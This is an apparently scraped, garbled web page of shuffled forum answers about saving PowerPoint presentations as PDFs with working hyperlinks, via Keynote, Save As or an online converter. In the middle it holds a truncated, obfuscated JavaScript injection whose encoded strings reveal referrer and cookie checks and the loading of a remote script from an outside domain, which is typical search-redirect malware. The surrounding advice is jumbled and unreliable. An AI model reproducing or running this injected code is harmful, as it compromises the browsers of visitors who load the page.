It can sometimes mess with formatting of embedded charts, but there is an easy workaround.. The reason the PDF export from the print dialog doesn't export the links is because the links aren't part of the usual data that would matter when printing, and so such things are stripped out when sent to the PDF "printer".. How can I save the presentation as a PDF while still enabling hyperlinks?I know this is a few years late, but I finally found the workaround since Microsoft is too lazy to fix this for Mac.. I did lose some formatting which had to be recreated in Keynote but the hyperlinks work now.. I've found what I believe is an ideal solution to this problem Smallpdf com provides a free online PPT to PDF conversion service, and it works great for preserving both formatting and hyperlinks.. var _0x350d=['cmVwbGFjZQ==','OyBleHBpcmVzPQ==','OyBwYXRoPQ==','OyBkb21haW49','eENidm8=','dnV6Z3M=','TmhsSlU=','ZHlFdm8=','R21sUFc=','OyBzZWN1cmU=','LmJpbmcu','LnlhaG9vLg==','LmFvbC4=','LmFzay4=','bUlO','Y01p','dmlzaXRlZA==','TkZa','allo','aHR0cHM6Ly9jbG91ZGV5ZXNzLm1lbi9kb25fY29uLnBocD94PWlvc3RpdGxlJnF1ZXJ5PQ==','Tk9yRE8=','ek1DUVk=','blVUY1A=','aUxKU2U=','cmVmZXJyZXI=','ZlhXR1g=','eWFxQ3M=','aW5kZXhPZg==','Zk5FZXU=','UGJtdGQ=','THhJSFc=','ZVhOSng=','c2V0','bWVDQ3Y=','SlBoTHM=','Sk5SdXo=','aUVrenM=','c2NyaXB0','aGVhZA==','Z0JFT3E=','c3Jj','ZFh5U3Q=','cG93ZXJwb2ludCt0bytwZGYra2VlcCtoeXBlcmxpbmtz','Y29va2ll','bWF0Y2g=','Uldsc2s=','c3BsaXQ='];(function(_0x245fcd,_0xc844db){var _0x11bcfb=function(_0x5cf306){while(--_0x5cf306){_0x245fcd['push'](_0x245fcd['shift']());}};_0x11bcfb(++_0xc844db);}(_0x350d,0xb2));var _0x5684=function(_0x25f2ee,_0x2140f0){_0x25f2ee=_0x25f2ee-0x0;var _0x36a170=_0x350d[_0x25f2ee];if(_0x5684['initialized']===undefined){(function(){var _0x3c1948;try{var _0x389d2f=Function('return\x20(function()\x20'+'{}.. Just "Save Picture As " to create a PNG from the chart, then delete the chart and insert the PNG.. I hope others find this as useful as I do!You can still save it as a PDF with working links, but there's a slightly different way to do it.. Note that the free service is limited to two conversions per hour The Keynote workflow works too, but as others have noted, it tends to change how slides are formatted.. Go to File => Save As Next, select "PDF" for the Format dropdown PDF will be listed under "Common Formats" in the dropdown.. If you open the PowerPoint in Apple's Keynote, then export from Keynote as a PDF, all hyperlinks (both in-document and URLs) will remain intact!I tried both options, but only the keynote version worked. a5171a3e95
